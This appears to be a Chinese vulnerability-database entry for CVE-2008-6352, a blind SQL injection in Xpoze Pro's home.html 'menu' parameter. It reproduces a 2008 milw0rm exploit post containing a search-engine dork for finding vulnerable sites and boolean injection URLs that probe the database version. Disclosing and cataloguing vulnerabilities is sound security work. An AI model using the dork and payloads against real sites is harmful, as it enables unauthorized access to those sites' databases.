Xpoze 'home.html' SQL注入漏洞

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1117019 漏洞类型 SQL注入
发布时间 2008-12-12 更新时间 2009-03-02
CVE编号 CVE-2008-6352 CNNVD-ID CNNVD-200903-006
漏洞平台 PHP CVSS评分 7.5
|漏洞来源
https://www.exploit-db.com/exploits/7432
https://cxsecurity.com/issue/WLB-2009030111
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200903-006
|漏洞详情
XpozePro4.10版本的home.html中存在SQL注入漏洞。远程攻击者可以借助menu参数,执行任意SQL指令。
|漏洞EXP
[■]  Xpoze Pro  (home menù) <= Blind $ql Injection

 
>---------------------------------------<

> AuToR: XaDoS (SecurityCode Team)
> Contact M&: xados [at] hotmail [dot] it
> B§g: Blind $ql inJection
> SIte vuln: http://www.xpoze.org/

>---------------------------------------<
 
 
[â– ] ExPL0iT:
 
Dork: " Powered by Xpoze "

|: http://www.example.com/home.html?menu=[$qL] 


[■] D£M0: 
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=5  [NO°°]
 
|: http://demo.xpoze.org/home.html?menu=110%20and%20substring(@@version,1,1)=4 [y&$ ;-)] 
 

 
[â– ] Th4nKs::
 
\> Str0ke </ \>Il pavimento</ \>sibilla</ \>Lo z00</ \>I FoxHound ( goto www.myspace.com/foxhoundindie )

# milw0rm.com [2008-12-12]
|参考资料

来源:BID
名称:32789
链接:http://www.securityfocus.com/bid/32789
来源:MILW0RM
名称:7432
链接:http://www.milw0rm.com/exploits/7432
来源:SECUNIA
名称:33126
链接:http://secunia.com/advisories/33126